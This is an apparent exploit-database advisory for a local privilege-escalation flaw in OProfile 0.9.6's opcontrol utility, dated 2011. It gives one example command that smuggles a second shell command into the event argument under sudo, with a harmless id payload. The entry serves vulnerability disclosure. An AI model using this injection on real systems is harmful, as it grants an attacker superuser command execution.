OProfile 0.9.6 - 'opcontrol' Utility 'set_event()' Local Privilege Escalation

EDB-ID:

35681


Platform:

Linux

Published:

2011-04-29

source: https://www.securityfocus.com/bid/47652/info

OProfile is prone to a local privilege-escalation vulnerability.

An attacker can exploit this issue to run arbitrary commands with superuser privileges. 

The following example command is available:

sudo opcontrol -e "abcd;/usr/bin/id"